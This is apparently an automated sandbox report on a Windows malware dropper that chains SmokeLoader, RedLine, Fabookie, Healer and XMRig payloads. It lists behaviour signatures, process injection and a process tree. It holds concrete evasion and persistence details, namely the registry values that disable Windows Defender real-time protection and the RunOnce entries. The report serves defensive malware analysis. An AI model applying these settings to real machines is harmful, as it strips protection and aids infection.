Malware Analysis Report

2025-08-06 03:37

Sample ID 230923-yn248aca24
Target 1a6169a1c8ca4b8ef0b6424ff4bcc6a0fda299654d5f33e683516fc6658a2855
SHA256 1a6169a1c8ca4b8ef0b6424ff4bcc6a0fda299654d5f33e683516fc6658a2855
Tags
fabookie healer redline smokeloader xmrig nanya backdoor dropper evasion infostealer miner persistence spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

1a6169a1c8ca4b8ef0b6424ff4bcc6a0fda299654d5f33e683516fc6658a2855

Threat Level: Known bad

The file 1a6169a1c8ca4b8ef0b6424ff4bcc6a0fda299654d5f33e683516fc6658a2855 was found to be: Known bad.

Malicious Activity Summary

fabookie healer redline smokeloader xmrig nanya backdoor dropper evasion infostealer miner persistence spyware stealer trojan

SmokeLoader

Detect Fabookie payload

RedLine payload

xmrig

Fabookie

Healer

Detects Healer an antivirus disabler dropper

RedLine

Modifies Windows Defender Real-time Protection settings

XMRig Miner payload

Downloads MZ/PE file

Executes dropped EXE

Checks computer location settings

Uses the VBS compiler for execution

Adds Run key to start application

Suspicious use of SetThreadContext

Program crash

Enumerates physical storage devices

Unsigned PE

Uses Task Scheduler COM API

Suspicious use of SendNotifyMessage

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: MapViewOfSection

Checks SCSI registry key(s)

Runs net.exe

Enumerates system info in registry

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-09-23 19:56

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-09-23 19:56

Reported

2023-09-23 19:59

Platform

win10v2004-20230915-en

Max time kernel

95s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\1a6169a1c8ca4b8ef0b6424ff4bcc6a0fda299654d5f33e683516fc6658a2855.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Healer

dropper healer

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7353.exe N/A

Uses the VBS compiler for execution

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\1a6169a1c8ca4b8ef0b6424ff4bcc6a0fda299654d5f33e683516fc6658a2855.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3676108.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v7820166.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\v9064504.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\77B9.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2320 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\1a6169a1c8ca4b8ef0b6424ff4bcc6a0fda299654d5f33e683516fc6658a2855.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3676108.exe
PID 2320 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\1a6169a1c8ca4b8ef0b6424ff4bcc6a0fda299654d5f33e683516fc6658a2855.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3676108.exe
PID 2320 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\1a6169a1c8ca4b8ef0b6424ff4bcc6a0fda299654d5f33e683516fc6658a2855.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3676108.exe
PID 3064 wrote to memory of 1340 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3676108.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v7820166.exe
PID 3064 wrote to memory of 1340 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3676108.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v7820166.exe
PID 3064 wrote to memory of 1340 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3676108.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v7820166.exe
PID 1340 wrote to memory of 4060 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v7820166.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\v9064504.exe
PID 1340 wrote to memory of 4060 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v7820166.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\v9064504.exe
PID 1340 wrote to memory of 4060 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v7820166.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\v9064504.exe
PID 4060 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\v9064504.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\a1230928.exe
PID 4060 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\v9064504.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\a1230928.exe
PID 4060 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\v9064504.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\a1230928.exe
PID 1232 wrote to memory of 3800 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\a1230928.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1232 wrote to memory of 3800 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\a1230928.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1232 wrote to memory of 3800 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\a1230928.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1232 wrote to memory of 3800 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\a1230928.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1232 wrote to memory of 3800 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\a1230928.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1232 wrote to memory of 3800 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\a1230928.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1232 wrote to memory of 3800 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\a1230928.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1232 wrote to memory of 3800 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\a1230928.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4060 wrote to memory of 716 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\v9064504.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\b3703703.exe
PID 4060 wrote to memory of 716 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\v9064504.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\b3703703.exe
PID 4060 wrote to memory of 716 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\v9064504.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\b3703703.exe
PID 716 wrote to memory of 3160 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\b3703703.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 716 wrote to memory of 3160 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\b3703703.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 716 wrote to memory of 3160 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\b3703703.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 716 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\b3703703.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 716 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\b3703703.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 716 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\b3703703.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 716 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\b3703703.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 716 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\b3703703.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 716 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\b3703703.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 716 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\b3703703.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 716 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\b3703703.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 716 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\b3703703.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 716 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\b3703703.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 716 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\b3703703.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 716 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\b3703703.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 716 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\b3703703.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1340 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v7820166.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\c2337682.exe
PID 1340 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v7820166.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\c2337682.exe
PID 1340 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v7820166.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\c2337682.exe
PID 2020 wrote to memory of 748 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\c2337682.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2020 wrote to memory of 748 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\c2337682.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2020 wrote to memory of 748 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\c2337682.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2020 wrote to memory of 748 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\c2337682.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2020 wrote to memory of 748 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\c2337682.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2020 wrote to memory of 748 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\c2337682.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2020 wrote to memory of 748 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\c2337682.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2020 wrote to memory of 748 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\c2337682.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3064 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3676108.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\d3458481.exe
PID 3064 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3676108.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\d3458481.exe
PID 3064 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3676108.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\d3458481.exe
PID 4120 wrote to memory of 3344 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\d3458481.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4120 wrote to memory of 3344 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\d3458481.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4120 wrote to memory of 3344 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\d3458481.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4120 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\d3458481.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4120 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\d3458481.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4120 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\d3458481.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4120 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\d3458481.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4120 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\d3458481.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4120 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\d3458481.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2320 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\1a6169a1c8ca4b8ef0b6424ff4bcc6a0fda299654d5f33e683516fc6658a2855.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\e1493527.exe
PID 2320 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\1a6169a1c8ca4b8ef0b6424ff4bcc6a0fda299654d5f33e683516fc6658a2855.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\e1493527.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\1a6169a1c8ca4b8ef0b6424ff4bcc6a0fda299654d5f33e683516fc6658a2855.exe

"C:\Users\Admin\AppData\Local\Temp\1a6169a1c8ca4b8ef0b6424ff4bcc6a0fda299654d5f33e683516fc6658a2855.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3676108.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3676108.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v7820166.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v7820166.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\v9064504.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\v9064504.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\a1230928.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\a1230928.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1232 -ip 1232

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1232 -s 556

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\b3703703.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\b3703703.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 716 -ip 716

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 716 -s 552

